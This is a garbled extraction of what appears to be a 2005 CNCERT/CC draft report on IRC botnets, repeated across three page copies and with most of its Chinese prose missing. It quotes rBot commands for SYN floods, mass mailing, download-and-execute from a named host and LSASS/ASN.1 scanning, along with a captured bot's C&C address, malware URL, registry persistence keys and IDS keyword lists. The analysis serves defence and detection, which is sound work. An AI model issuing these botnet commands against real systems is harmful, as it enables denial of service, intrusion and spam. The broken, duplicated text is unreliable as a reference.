Worm DDos Spam - SecurityCN.net · CNCERT/CC CNCERT/CC CNCERTCC_TR_2005-001(Draft) Worm DDos Spam Phishing Spyware Botnet [1] Bot DDos DDos Bot: ±Robo Bot

CNCERTCC

CNCERTCC CNCERTCC_TR_2005-001(Draft)

Worm DDos Spam

Phishing Spyware

Botnet

[1]

Bot

DDos

DDos

Bot "Robot"

Zombie Zombie Bot Bot

Zombie Bot Bot

Zombie

IRC Bot IRC Bot IRC Bot

Channel

IRC Bot

Bot IRC Bot Bot

Command&Control Server IRC Bot IRC &

C&C S

BotNet Bot C&C S

IRC 1

Bot

IRC

1 IRC

IRC

Bot

Bot

IRC

AOL Bot IRC Bot AOL AIM-Canbot

Fizzer AOL Instant Messenger Bot

P2P Bot Bot

phatbot P2P

Bot 90 Unix Bot 1993

Eggdrop Bot Bot IRC

Bot Bot Bot

Bot Bot IRC Bot Bot Bot 036hotmailcom

MSN Bot

1999

11 SubSeven 21 IRC

IRC Bot IRC Bot

Bot IRC Bot Bot

Windows Spam DDos Bot

Bot (Worm) Bot

Bot 2003 Deloader Bot

Bot Bot

Bot

Bot

Trojan Horse Bot

IP Bot

IRC DCC

Bot

Spyware

2

Bot

trojan horse

worm

Spyware

virus

2

1

2001

[16]

Botnet

2004 3 19

Witty Witty 10

110 20 50

2

DDoS DDoS

DDoS

DDoS

DDoS DDoS

3

IP CERT MessageLab [9][10] DDoS

4

5

6

socks

IRC IRC Bot

1 IRC Internet Relay Chat

IRC RFC1459 IRC Channel

IRC

IRC IRC IRC

irc.263.net IP IP IRC Server

A IP1 B IP2 A B

IRC Server irc.263.net

IRC

IRC TCP 6667 6000 7000

IRC Bot 443 8000 500

IRC

2 IRC Bot

IRC Bot IRC IRC

HIRC mIRC 1 IRC Bot IRC

2 IRC Bot

IRC Bot IRC GT bot

IRC mIRC mIRC

mIRC mIRC GT bot

mIRC

IRC Bot IRC IRC Bot

IRC

1 NICK USER Bot IRC

2 PASS IRC PASS TCP

3 JOIN Channel key key

3) MODE IRC Bot

4) PING PONG IRC IRC

PING PONG PING

IRC IRC Bot

PINGPONG IRC Bot

5) PRIVMSG Channel msg Bot

6) DCC SEND Bot

3

(Bot) IRC

P2P

IRC DCC 1987

2004 CNCERTCC

1

DDos

->PRIVMSG #rbot :syn www.xxx.com

80 200 3600\n

rbot syn syn flood 200

www.xxx.com 80 syn 3600 -> bot C&C S

<-

2

(Phishing)

DNS

host pharming

ISP

redirector

[6]

Phishing

3 (Spam)

Spammer

blacklist

1

->PRIVMSG #rbot :mm http://www.recpt.com/fetch.php http://www.mail.net/email.html

mm mass mail http://www.recpt.com

fetch.php php

http://www.mail.net/email.html

ip spammer

2 socks v4/v5 Open Relay

Spammer Open Proxy Open Mail Relay

Open Relay Server Open Mail Relay Spammer

Spammer Proxy Open Relay Proxy

Open Relay Spammer Proxy Open Relay

Spammer

socks v4 Smtp Open Relay

socks v4 Open Relay

IP ISP IP

3

email AgoBot

harvestemails

4 (Spyware)

Spyware Keylogger

->PRIVMSG #rBot :Download http://www.elitecoders.net/update.exe c:\rBot.exe 1

http://www.elitecoders.net update.exe c:\rBot.exe 1

Windows Bot

Bot bot

PINGPONG bot

IRC TCP 6667 CNCERTCC

bot bot

cmd.exe "netstat -an" IP

IP

135 445

fport.exe netstat

11

bot

CD-Key

bot

bot ie

ie bot rootkit [2]

bot rootkit

rootkit bot

CNCERTCC

1 honeypot bot

2) IDS

3

IRC

1 Honeypot

bot bot Honeywall

bot dnsip

windows 25 [11]

bot bot

[3] honeynet project 2004 11

2005 3 1 HoneyWall 1 mwcollect[8]

180

30 5500 800 2004

11 2005 1 406 Ddos 179 [4]

2

IRC IDS IRC Bot JOIN PASS

PRIVMSG NICK TOPIC NOTICE

IRC TCP

udp syn ddos http download exe update scan exploit login

logon advscan lsass dcom beagle dameware

3

1 bot(fast joining bots)

bots IRC

IRC

2) bot(Long standing connection)

bots

3) bot(not talkative)

Bots bot pingpong

DDoSVax [5] Bot

4

1

IDS bot

bot bot

bot bot

IDS IRC

2

IDS IRC

Bot IRC IRC RFC IDS

bot

IRC IRC

3

IDS

bot

IDS

socks v4

Server "TOPIC #rBot :advscan lsass 200 5 0 -r -s"

a

->TOPIC #rBot :advscan lsass 200 5 0 -r -s\n

b

->TOPIC #rBot :advscan lsass 200 5 0 -r -s\n

c) Botnet bot

<-:ControllerNICK!ControllerUSER@socks(HOST or IP) TOPIC #rBot :advscan lsass

200 5 0 -r -s\r\n

IDS bot

IP IP IP IP

IDS 3 1 3

1 3 1

1 IDS

IRC

1

IP port ( )

2

channel ( )

3 Host

login pass

host bot

4 Bot

login update download uninstall

Botnet

1

bot

1

bot

bot

bot

2

bot

bot bot

bot

2

IP

bot

3 bot

2005 CNCERTCC

Bot

1 IRC

IRC bot

bot bot

IRC

Serv1 Serv2 … ServN

IRC Serv1 Serv1 IP Serv2

Serv3 Serv2 Nick_Serv1

Serv2 Serv1 IRC ServX Nick_Serv3

Nick_Serv6 Serv3 Serv6 ServX

2 TOPIC

TOPIC IRC

bot TOPIC

TOPIC 1) advscan lsass 200 5 0 -r -s

LSASS 200 5 -r = random

-s = silent

2) httpupdate http://server/rBot.exe c:\rBot.exe 1

server rBot.exe c:\ 1

CNCERTCC TOPIC Bot

TOPIC "JOIN #newchannel"

TOPIC PRIVMSG

bot bot bot TOPIC

TOPIC IP IP

IP

3

bot

bot

Bot

login logon auth

bot bot nick

host rBot v065

1

->PRIVMSG #rbot :login password -s\n

IP

2 bot

<-:ControllerNICK!ControllerUSER@host PRIVMSG #rbot :login password -s\r\n

1 2

IP Bot

host

IP

<-:ControllerNICK!ControllerUSER@10.10.10.10 PRIVMSG #rbot :login password -s\r\n

10.10.10.10 login

3 rBot NICK

ControllerNICK USER(ControllerUSER) host (login) (password

-s) rBot

user host rBot

host net com net

com rBot host com net

()

4 -s silent bot

->PRIVMSG #rbot :password accepted\n

bot

Windows Windows

bot 90

[7]

Windows XP

11

Bot

Symantec 2004 1 6 Bot

2000 30000 [15] MessageLabs 2004

70 [10] CipherTrust 2005 4 5

15 17 20-15

Bot [12]

IRC Agobot

PhatBot P2P

IRC P2P

2005 rootkit bot(rBot )

rootkit bot bot

2004

CNCERTCC Bot

IRC

P2P P2P bot

Phatbot[13] sinit[14]

Phatbot Gnutella Gnutella cache servers server peer

peer TCP 4387 Gnutella Phatbot

waste waste Phatbot waste

md5

Phatbot

sinit P2P Peer

dll dll sinit

bot

CNCERTCC bot

http://goa-irc.co.uk/wosten/rbot.exe 2005 7 9 9 rbot.exe

IP 10.0.0.1

sniffer

cmd.exe

c:\>netstat -an

TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP 10.0.0.1:1150 203.151.217.85:6667 ESTABLISHED
TCP 10.0.0.1:1616 202.108.32.137:445 FIN_WAIT_1
TCP 10.0.0.1:1631 202.108.32.147:445 FIN_WAIT_1
TCP 10.0.0.1:1714 202.108.32.190:445 FIN_WAIT_1
TCP 10.0.0.1:1727 202.108.32.165:445 FIN_WAIT_1
TCP 10.0.0.1:2253 202.108.34.211:445 TIME_WAIT
TCP 10.0.0.1:2904 202.108.37.91:445 TIME_WAIT
TCP 10.0.0.1:3476 202.108.39.151:445 TIME_WAIT
TCP 10.0.0.1:3478 202.108.39.153:445 TIME_WAIT
TCP 10.0.0.1:3480 202.108.39.155:445 TIME_WAIT
TCP 10.0.0.1:3486 202.108.39.151:445 TIME_WAIT
TCP 10.0.0.1:3487 202.108.39.153:445 TIME_WAIT
TCP 10.0.0.1:3488 202.108.39.155:445 TIME_WAIT
TCP 10.0.0.1:3673 202.108.40.82:445 TIME_WAIT
TCP 10.0.0.1:3674 202.108.40.82:445 TIME_WAIT
TCP 10.0.0.1:4953 202.108.45.20:445 TIME_WAIT
TCP 10.0.0.1:4955 202.108.45.20:445 TIME_WAIT
TCP 10.0.0.1:4959 202.108.45.23:445 TIME_WAIT
TCP 10.0.0.1:4961 202.108.45.23:445 TIME_WAIT
UDP 0.0.0.0:69 *:* (UDP 69)
UDP 0.0.0.0:445 *:*
UDP 10.0.0.1:137 *:*
UDP 10.0.0.1:138 *:*

fport.exe

C:\>fport | find "1150" (1150 6667)

1048 wininit -> 1150 TCP C:\WINNT\system32\wininit.exe

C:\>fport | find "69"

1048 wininit -> 69 UDP C:\WINNT\system32\wininit.exe

6667 69 wininit.exe rBot

wininit.exe sysinternals FileMon

bot sysinternals autoruns

rBot

HKLM\Software\Microsoft\Windows\CurrentVersion\Run "Microsoft Update 32" wininit.exe

HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices "Microsoft Update 32" wininit.exe

Wininit 445 6667

IP

203.151.217.85 6667

TCP

Wininit IRC

->NICK CHN|9148119\r\nUSER autdeoxsnv 0 0 :CHN|9148119\r\n

->JOIN #xdcc dropit\r\n (channel #xdcc, key dropit)

<- :CHN|9148119!autdeoxsnv@10.0.0.1 332 CHN|9148119 #xdcc :advscan asn1smb 100 5 0 -b

(advscan asn1smb)

->PRIVMSG #xdcc :[SCAN] Sequential Port Scan Started On 10.0.0.0:445 within a delay of 5 seconds for 0

min using 100 threads\r\n

CNCERTCC 2005

[1] 2005.4

[2] Malicious Bots Hide Using Rootkit Code, by Paul F. Roberts, May 17, 2005, http://www.eweek.com/article2/0,1759,1816972,00.asp

[3] Honeynet Project, "Know your Enemy: Tracking Botnets"

[4] Botnet Tracking: Exploring a Root-Cause Methodology to Prevent Distributed Denial-of-Service Attacks, Felix C. Freiling, Thorsten Holz and Georg Wicherski, http://www.honeynet.org/papers/individual/

[5] Detecting Bots in Internet Relay Chat Systems, Jonas Bolliger, Thomas Kaufmann, www.tik.ee.ethz.ch/~ddosvax/sada/sa-2004-29/task.pdf

[6] Know your Enemy: Phishing, http://www.honeynet.org, 16th May 2005

[7] Shield: First-Line Worm Defense, Helen J. Wang, Chuanxiong, Daniel R. Simon and Alf Zugenmaier, Microsoft Research, ACM SIGCOMM 2004

[8] http://www.mwcollect.org

[9] http://www.cert.org

[10] http://www.messagelab.co.uk

[11] Joe Stewart, "Emerging Threats: From Discovery to Protection", www.sdissa.org/downloads/emergingthreats-public.pdf

[12] http://www.ciphertrust.com/resources/statistics/zombie.php

[13] Lurhq Threat Intelligence Group, Phatbot Trojan Analysis, http://www.lurhq.com/phatbot.html

[14] Lurhq Threat Intelligence Group, Sinit P2P Trojan Analysis, http://www.lurhq.com/sinit.html

[15] http://www.symantec.com/press/index_2004.html

[16] Tom Vogt, Simulating and optimising worm propagation algorithms, www.securityfocus.com/guest/24046, 2003.9

This document was created with Win2PDF available at httpwwwdaneprairiecomThe unregistered version of Win2PDF is for evaluation or non-commercial use only

Page 2: Worm DDos Spam - SecurityCN.net · CNCERT/CC CNCERT/CC CNCERTCC_TR_2005-001(Draft) Worm DDos Spam Phishing Spyware Botnet [1] Bot DDos DDos Bot: ±Robo Bot

Zombie Zombie Bot Bot

Zombie Bot Bot

Zombie

IRC Bot IRC Bot IRC Bot

Channel

IRC Bot

Bot IRC Bot Bot

CommandampControl Server IRC Bot IRC amp

CampC S

BotNet Bot CampC S

IRC 1

Bot

IRC

1 IRC

IRC

Bot

Bot

IRC

AOL Bot IRC Bot AOL AIM-Canbot

Fizzer AOL Instant Messager Bot

P2P Bot Bot

phatbot P2P

Bot 90 Unix Bot 1993

Eggdrop Bot Bot IRC

Bot Bot Bot

Bot Bot IRC Bot Bot Bot 036hotmailcom

MSN Bot

1999

11 SubSeven 21 IRC

IRC Bot IRC Bot

Bot IRC Bot Bot

Windows Spam DDos Bot

Bot (Worm) Bot

Bot 2003 Deloader Bot

Bot Bot

Bot

Bot

Trojan Horse Bot

IP Bot

IRC DCC

Bot

Spyware

2

Bot

trojan horse

worm

Spyware

virus

2

1

2001

[16]

Botnet

2004 3 19

Witty Witty 10

110 20 50

2

DDoS DDoS

DDoS

DDoS

DDoS DDoS

3

IP CERT MessageLab [9][10] DDoS

4

5

6

socks

IRC IRC Bot

1 IRC Internet Relay Chat

IRC RFC1459 IRC Channel

IRC

IRC IRC IRC

irc263net IP IP IRC Server

A IP1 B IP2 A B

IRC Server irc263net

IRC

IRC TCP 6667 6000 7000

IRC Bot 443 8000 500

IRC

2 IRC Bot

IRC Bot IRC IRC

HIRC mIRC 1 IRC Bot IRC

2 IRC Bot

IRC Bot IRC GT bot

IRC mIRC mIRC

mIRC mIRC GT bot

mIRC

IRC Bot IRC IRC Bot

IRC

1 NICK USER Bot IRC

2 PASS IRC PASS TCP

3 JOIN Channel key key

3) MODE IRC Bot

4) PING PONG IRC IRC

PING PONG PING

IRC IRC Bot

PINGPONG IRC Bot

5) PRIVMSG Channel msg Bot

6) DCC SEND Bot

3

(Bot) IRC

P2P

IRC DCC 1987

2004 CNCERTCC

1

DDos

-gtPRIVMSG rbot syn wwwxxxcom

80 200 3600n

rbot syn syn flood 200

wwwxxxcom 80 syn 3600 -gt bot CampC S

lt-

2

(Phishing)

DNS

host pharming

ISP

redirector

[6]

Phi s h i ng

3 (Spam)

Spammer

blacklist

1

-gtPRIVMSG rbot mm httpwww recptcomfetchphp httpwwwmailnetemailhtml

mm mass mail httpwww recptcom

fetchphp php

httpwwwmailnetemailhtml

ip spammer

2 socks v4v5 Open Relay

Spammer Open Proxy Open Mail Relay

Open Relay Server Open Mail Relay Spammer

Spammer Proxy Open Relay Proxy

Open Relay Spammer Proxy Open Relay

Spammer

socks v4 Smtp Open Relay

socks v4 Open Relay

IP ISP IP

3

email AgoBot

harvestemails

4 (Spyware)

Spyware Keylogger

-gtPRIVMSG rBot Download httpwwwelitecodersnetupdateexe crBotexe 1

httpwwwelitecodersnet updateexe crBotexe 1

Windows Bot

Bot bot

PINGPONG bot

IRC TCP 6667 CNCERTCC

bot bot

cmdexe plusmnnetst at an IP

IP

135 445

fportexe netstat

11

bot

CD-Key

bot

bot ie

ie bot rootkit [2]

bot rootkit

rootkit bot

CNCERTCC

1 honeypot bot

2) IDS

3

IRC

1 Honeypot

bot bot Honeywall

bot dnsip

windows 25 [11]

bot bot

[3] honeynet project 2004 11

2005 3 1 HoneyWall 1 mwcollect[8]

180

30 5500 800 2004

11 2005 1 406 Ddos 179 [4]

2

IRC IDS IRC Bot JOIN PASS

PRIVMSG NICK TOPIC NOTICE

IRC TCP

udp syn ddos http download exe update scan exploit login

logon advscan lsass dcom beagle dameware

3

1 bot(fast joining bots)

bots IRC

IRC

2) bot(Long standing connection)

bots

3) bot(not talkative)

Bots bot pingpong

DdoSVax [5] Bot

4

1

IDS bot

bot bot

bot bot

IDS IRC

2

IDS IRC

Bot IRC IRC RFC IDS

bot

IRC IRC

3

IDS

bot

IDS

socks v4

Server plusmnTOPI rBot advscan lsass 200 5 0 -r s

a

-gtTOPIC rBot advscan lsass 200 5 0 -r sn

b

-gtTOPIC rBot advscan lsass 200 5 0 -r sn

c) Botnet bot

lt-ControllerNICKControllerUSERsocks(HOST or IP) TOPIC rBot advscan lsass

200 5 0 -r srn

IDS bot

IP IP IP IP

IDS 3 1 3

1 3 1

1 IDS

IRC

1

IP port ( )

2

channel ( )

3 Host

login pass

host bot

4 Bot

login update download uninstall

Botnet

1

bot

1

bot

bot

bot

2

bot

bot bot

bot

2

IP

bot

3 bot

2005 CNCERTCC

Bot

1 IRC

IRC bot

bot bot

IRC

Serv1 Serv2 shy Ser v N

IRC Serv1 Serv1 IP Serv2

Serv3 Serv2 Nick_Serv1

Serv2 Serv1 IRC ServX Nick_Serv3

Nick_Serv6 Serv3 Serv6 ServX

2 TOPIC

TOPIC IRC

bot TOPIC

TOPIC 1)advscan lsass 200 5 0 -r s

LSASS 200 5 -r = random

-s = silent

2)httpupdate httpserverrBotexe crBotexe 1

server rBotexe c 1

CNCERTCC TOPIC Bot

TOPIC degJ OI N ne wchanne

TOPIC PRIVMSG

bot bot bot TOPIC

TOPIC IP IP

IP

3

bot

bot

Bot

login logon auth

bot bot nick

host rBot v065

1

-gtPRIVMSG rbot login password sn

IP

2 bot

lt-ControllerNICKControllerUSERhost PRIVMSG rbot login password -srn

1 2

IP Bot

host

IP

lt-ControllerNICKControllerUSER10101010 PRIVMSG rbot login password -srn

10101010 login

3 rBot NICK

ControllerNICK USER(ControllerUSER) host (login) (password

-s) rBot

user host rBot

host net com net

com rBot host com net

()

4 -s silent bot

-gtPRIVMSG rbot password acceptedn

bot

Windows Windows

bot 90

[7]

Windows XP

11

Bot

Symantec 2004 1 6 Bot

2000 30000 [15] MessageLabs 2004

70 [10] CipherTrust 2005 4 5

15 17 20-15

Bot [12]

IRC Agobot

PhatBot P2P

IRC P2P

2005 rootkit bot(rBot )

rootkit bot bot

2004

CNCERTCC Bot

IRC

P2P P2P bot

Phatbot[13] sinit[14]

Phatbot Gnutella Guutella cache servers server peer

peer TCP 4387 Gnutella Phatbot

waste waste Phatbot waste

md5

Phatbot

sinit P2P Peer

dll dll sinit

bot

CNCERTCC bot

httpgoa-irccoukwostenrbotexe 2005 7 9 9 rbotexe

IP 10001

sniffer

cmdexe

cgtnetstat anrn

TCP 0000135 00000 LISTENING

TCP 0000445 00000 LISTENING

TCP 100011150 203151217856667 ESTABLISHED

TCP 100011616 20210832137445 FIN_WAIT_1

TCP 100011631 20210832147445 FIN_WAIT_1

TCP 100011714 20210832190445 FIN_WAIT_1

TCP 100011727 20210832165445 FIN_WAIT_1

TCP 100012253 20210834211445 TIME_WAIT

TCP 100012904 2021083791445 TIME_WAIT

TCP 100013476 20210839151445 TIME_WAIT

TCP 100013478 20210839153445 TIME_WAIT

TCP 100013480 20210839155445 TIME_WAIT

TCP 100013486 20210839151445 TIME_WAIT

TCP 100013487 20210839153445 TIME_WAIT

TCP 100013488 20210839155445 TIME_WAIT

TCP 100013673 2021084082445 TIME_WAIT

TCP 100013674 2021084082445 TIME_WAIT

TCP 100014953 2021084520445 TIME_WAIT

TCP 100014955 2021084520445 TIME_WAIT

TCP 100014959 2021084523445 TIME_WAIT

TCP 100014961 2021084523445 TIME_WAIT

UDP 000069 UDP 69

UDP 0000445

UDP 10001137

UDP 10001138

fportexe

C gtfport | find 1150 1150 6667

1048 wininit -gt 1150 TCP CWINNTsystem32wininitexe

Cgtfport | find 69

1048 wininit -gt 69 UDP CWINNTsystem32wininitexe

6667 69 wininitexe rBot

wininitexe sysinternals FileMon

bot sysinternals autoruns

rBot

HKLMSoftwareMicrosoftWindowsCurrentVersionRunMicrosoft Update 32 wininitexe

HKLMSoftwareMicrosoftWindowsCurrentVersionRunServicesMicrosoft Update 32 wininitexe

Wininit 445 6667

IP

20315121785 6667

TCP

Wininit IRC

-gtNICK CHN|9148119rnUSER autdeoxsnv 0 0 CHN|9148119rn ( )

-gtJOIN xdcc dropitrn ( xdcc dropit)

lt- CHN|9148119 autdeoxsnv 10001 332 CHN|9148119 xdcc advscan asn1smb 100 5 0 b (

advscan asn1smb )

-gtPRIVMSG xdcc [SCAN] Sequential Port Scan Started On 10000445 within a delay of 5 seconds for 0

min using 100 threadsrn( )

CNCERTCC 2005

[1]

20054

[2] Malicious Bots Hide Using Rootkit Code By Paul F Roberts May 17 2005

httpwwweweekcomarticle201759181697200asp

[3] honeynet project plusmn Kno w your ene my

Tracking Botnet

[4] Botnet Tracking Exploring a Root-Cause Methodology to Prevent Distributed Denial-of-Service Attacks

Felix C Freiling and Thorsten Holz and Georg Wicherski httpwwwhoneynetorgpapersindividual

[5] Detecting Bots in Internet Relay Chat Systems Jonas Bolliger Thomas Kaufmann

wwwtikeeethzch~ddosvaxsadasa-2004-29taskpdf

[6] Know your EnemyPhishing httpwwwhoneynetorg 16th May 2005

[7] Shield First-Line Worm Defense Helen J Wang Chuanxiong Daniel R Simon and Alf Zugenmaier

Microsoft Research ACM SIGCOMM 2004

[8] httpwwwmwcollectorg

[9] httpwwwcertorg

[10] httpwwwmessagelabcouk

[11] Joe Stewart deg E mer gi ng Threats Fr o m Discover y t o Pr ot ecti o

wwwsdissaorgdownloadsemergingthreats-publicpdf

[12] httpwwwciphertrustcomresourcesstatisticszombiephp

[13] Lurhq Threat Intelligence Group Phatbot Trojan Analysis httpwwwlurhqcomphatbothtml

[14] Lurhq Threat Intelligence Group

Sinit P2P Trojan Analysis httpwwwlurhqcomsinithtml

[15] httpwwwsymanteccompressindex_2004html

[16] Tom Vogt Simulating and optimising worm propagation algorithms

wwwsecurityfocuscomguest24046 20039

This document was created with Win2PDF available at httpwwwdaneprairiecomThe unregistered version of Win2PDF is for evaluation or non-commercial use only

Page 3: Worm DDos Spam - SecurityCN.net · CNCERT/CC CNCERT/CC CNCERTCC_TR_2005-001(Draft) Worm DDos Spam Phishing Spyware Botnet [1] Bot DDos DDos Bot: ±Robo Bot

Bot

Bot

IRC

AOL Bot IRC Bot AOL AIM-Canbot

Fizzer AOL Instant Messager Bot

P2P Bot Bot

phatbot P2P

Bot 90 Unix Bot 1993

Eggdrop Bot Bot IRC

Bot Bot Bot

Bot Bot IRC Bot Bot Bot 036hotmailcom

MSN Bot

1999

11 SubSeven 21 IRC

IRC Bot IRC Bot

Bot IRC Bot Bot

Windows Spam DDos Bot

Bot (Worm) Bot

Bot 2003 Deloader Bot

Bot Bot

Bot

Bot

Trojan Horse Bot

IP Bot

IRC DCC

Bot

Spyware

2

Bot

trojan horse

worm

Spyware

virus

2

1

2001

[16]

Botnet

2004 3 19

Witty Witty 10

110 20 50

2

DDoS DDoS

DDoS

DDoS

DDoS DDoS

3

IP CERT MessageLab [9][10] DDoS

4

5

6

socks

IRC IRC Bot

1 IRC Internet Relay Chat

IRC RFC1459 IRC Channel

IRC

IRC IRC IRC

irc263net IP IP IRC Server

A IP1 B IP2 A B

IRC Server irc263net

IRC

IRC TCP 6667 6000 7000

IRC Bot 443 8000 500

IRC

2 IRC Bot

IRC Bot IRC IRC

HIRC mIRC 1 IRC Bot IRC

2 IRC Bot

IRC Bot IRC GT bot

IRC mIRC mIRC

mIRC mIRC GT bot

mIRC

IRC Bot IRC IRC Bot

IRC

1 NICK USER Bot IRC

2 PASS IRC PASS TCP

3 JOIN Channel key key

3) MODE IRC Bot

4) PING PONG IRC IRC

PING PONG PING

IRC IRC Bot

PINGPONG IRC Bot

5) PRIVMSG Channel msg Bot

6) DCC SEND Bot

3

(Bot) IRC

P2P

IRC DCC 1987

2004 CNCERTCC

1

DDos

-gtPRIVMSG rbot syn wwwxxxcom

80 200 3600n

rbot syn syn flood 200

wwwxxxcom 80 syn 3600 -gt bot CampC S

lt-

2

(Phishing)

DNS

host pharming

ISP

redirector

[6]

Phi s h i ng

3 (Spam)

Spammer

blacklist

1

-gtPRIVMSG rbot mm httpwww recptcomfetchphp httpwwwmailnetemailhtml

mm mass mail httpwww recptcom

fetchphp php

httpwwwmailnetemailhtml

ip spammer

2 socks v4v5 Open Relay

Spammer Open Proxy Open Mail Relay

Open Relay Server Open Mail Relay Spammer

Spammer Proxy Open Relay Proxy

Open Relay Spammer Proxy Open Relay

Spammer

socks v4 Smtp Open Relay

socks v4 Open Relay

IP ISP IP

3

email AgoBot

harvestemails

4 (Spyware)

Spyware Keylogger

-gtPRIVMSG rBot Download httpwwwelitecodersnetupdateexe crBotexe 1

httpwwwelitecodersnet updateexe crBotexe 1

Windows Bot

Bot bot

PINGPONG bot

IRC TCP 6667 CNCERTCC

bot bot

cmdexe plusmnnetst at an IP

IP

135 445

fportexe netstat

11

bot

CD-Key

bot

bot ie

ie bot rootkit [2]

bot rootkit

rootkit bot

CNCERTCC

1 honeypot bot

2) IDS

3

IRC

1 Honeypot

bot bot Honeywall

bot dnsip

windows 25 [11]

bot bot

[3] honeynet project 2004 11

2005 3 1 HoneyWall 1 mwcollect[8]

180

30 5500 800 2004

11 2005 1 406 Ddos 179 [4]

2

IRC IDS IRC Bot JOIN PASS

PRIVMSG NICK TOPIC NOTICE

IRC TCP

udp syn ddos http download exe update scan exploit login

logon advscan lsass dcom beagle dameware

3

1 bot(fast joining bots)

bots IRC

IRC

2) bot(Long standing connection)

bots

3) bot(not talkative)

Bots bot pingpong

DdoSVax [5] Bot

4

1

IDS bot

bot bot

bot bot

IDS IRC

2

IDS IRC

Bot IRC IRC RFC IDS

bot

IRC IRC

3

IDS

bot

IDS

socks v4

Server plusmnTOPI rBot advscan lsass 200 5 0 -r s

a

-gtTOPIC rBot advscan lsass 200 5 0 -r sn

b

-gtTOPIC rBot advscan lsass 200 5 0 -r sn

c) Botnet bot

lt-ControllerNICKControllerUSERsocks(HOST or IP) TOPIC rBot advscan lsass

200 5 0 -r srn

IDS bot

IP IP IP IP

IDS 3 1 3

1 3 1

1 IDS

IRC

1

IP port ( )

2

channel ( )

3 Host

login pass

host bot

4 Bot

login update download uninstall

Botnet

1

bot

1

bot

bot

bot

2

bot

bot bot

bot

2

IP

bot

3 bot

2005 CNCERTCC

Bot

1 IRC

IRC bot

bot bot

IRC

Serv1 Serv2 shy Ser v N

IRC Serv1 Serv1 IP Serv2

Serv3 Serv2 Nick_Serv1

Serv2 Serv1 IRC ServX Nick_Serv3

Nick_Serv6 Serv3 Serv6 ServX

2 TOPIC

TOPIC IRC

bot TOPIC

TOPIC 1)advscan lsass 200 5 0 -r s

LSASS 200 5 -r = random

-s = silent

2)httpupdate httpserverrBotexe crBotexe 1

server rBotexe c 1

CNCERTCC TOPIC Bot

TOPIC degJ OI N ne wchanne

TOPIC PRIVMSG

bot bot bot TOPIC

TOPIC IP IP

IP

3

bot

bot

Bot

login logon auth

bot bot nick

host rBot v065

1

-gtPRIVMSG rbot login password sn

IP

2 bot

lt-ControllerNICKControllerUSERhost PRIVMSG rbot login password -srn

1 2

IP Bot

host

IP

lt-ControllerNICKControllerUSER10101010 PRIVMSG rbot login password -srn

10101010 login

3 rBot NICK

ControllerNICK USER(ControllerUSER) host (login) (password

-s) rBot

user host rBot

host net com net

com rBot host com net

()

4 -s silent bot

-gtPRIVMSG rbot password acceptedn

bot

Windows Windows

bot 90

[7]

Windows XP

11

Bot

Symantec 2004 1 6 Bot

2000 30000 [15] MessageLabs 2004

70 [10] CipherTrust 2005 4 5

15 17 20-15

Bot [12]

IRC Agobot

PhatBot P2P

IRC P2P

2005 rootkit bot(rBot )

rootkit bot bot

2004

CNCERTCC Bot

IRC

P2P P2P bot

Phatbot[13] sinit[14]

Phatbot Gnutella Guutella cache servers server peer

peer TCP 4387 Gnutella Phatbot

waste waste Phatbot waste

md5

Phatbot

sinit P2P Peer

dll dll sinit

bot

CNCERTCC bot

httpgoa-irccoukwostenrbotexe 2005 7 9 9 rbotexe

IP 10001

sniffer

cmdexe

cgtnetstat anrn

TCP 0000135 00000 LISTENING

TCP 0000445 00000 LISTENING

TCP 100011150 203151217856667 ESTABLISHED

TCP 100011616 20210832137445 FIN_WAIT_1

TCP 100011631 20210832147445 FIN_WAIT_1

TCP 100011714 20210832190445 FIN_WAIT_1

TCP 100011727 20210832165445 FIN_WAIT_1

TCP 100012253 20210834211445 TIME_WAIT

TCP 100012904 2021083791445 TIME_WAIT

TCP 100013476 20210839151445 TIME_WAIT

TCP 100013478 20210839153445 TIME_WAIT

TCP 100013480 20210839155445 TIME_WAIT

TCP 100013486 20210839151445 TIME_WAIT

TCP 100013487 20210839153445 TIME_WAIT

TCP 100013488 20210839155445 TIME_WAIT

TCP 100013673 2021084082445 TIME_WAIT

TCP 100013674 2021084082445 TIME_WAIT

TCP 100014953 2021084520445 TIME_WAIT

TCP 100014955 2021084520445 TIME_WAIT

TCP 100014959 2021084523445 TIME_WAIT

TCP 100014961 2021084523445 TIME_WAIT

UDP 000069 UDP 69

UDP 0000445

UDP 10001137

UDP 10001138

fportexe

C gtfport | find 1150 1150 6667

1048 wininit -gt 1150 TCP CWINNTsystem32wininitexe

Cgtfport | find 69

1048 wininit -gt 69 UDP CWINNTsystem32wininitexe

6667 69 wininitexe rBot

wininitexe sysinternals FileMon

bot sysinternals autoruns

rBot

HKLMSoftwareMicrosoftWindowsCurrentVersionRunMicrosoft Update 32 wininitexe

HKLMSoftwareMicrosoftWindowsCurrentVersionRunServicesMicrosoft Update 32 wininitexe

Wininit 445 6667

IP

20315121785 6667

TCP

Wininit IRC

-gtNICK CHN|9148119rnUSER autdeoxsnv 0 0 CHN|9148119rn ( )

-gtJOIN xdcc dropitrn ( xdcc dropit)

lt- CHN|9148119 autdeoxsnv 10001 332 CHN|9148119 xdcc advscan asn1smb 100 5 0 b (

advscan asn1smb )

-gtPRIVMSG xdcc [SCAN] Sequential Port Scan Started On 10000445 within a delay of 5 seconds for 0

min using 100 threadsrn( )

CNCERTCC 2005

[1]

20054

[2] Malicious Bots Hide Using Rootkit Code By Paul F Roberts May 17 2005

httpwwweweekcomarticle201759181697200asp

[3] honeynet project plusmn Kno w your ene my

Tracking Botnet

[4] Botnet Tracking Exploring a Root-Cause Methodology to Prevent Distributed Denial-of-Service Attacks

Felix C Freiling and Thorsten Holz and Georg Wicherski httpwwwhoneynetorgpapersindividual

[5] Detecting Bots in Internet Relay Chat Systems Jonas Bolliger Thomas Kaufmann

wwwtikeeethzch~ddosvaxsadasa-2004-29taskpdf

[6] Know your EnemyPhishing httpwwwhoneynetorg 16th May 2005

[7] Shield First-Line Worm Defense Helen J Wang Chuanxiong Daniel R Simon and Alf Zugenmaier

Microsoft Research ACM SIGCOMM 2004

[8] httpwwwmwcollectorg

[9] httpwwwcertorg

[10] httpwwwmessagelabcouk

[11] Joe Stewart deg E mer gi ng Threats Fr o m Discover y t o Pr ot ecti o

wwwsdissaorgdownloadsemergingthreats-publicpdf

[12] httpwwwciphertrustcomresourcesstatisticszombiephp

[13] Lurhq Threat Intelligence Group Phatbot Trojan Analysis httpwwwlurhqcomphatbothtml

[14] Lurhq Threat Intelligence Group

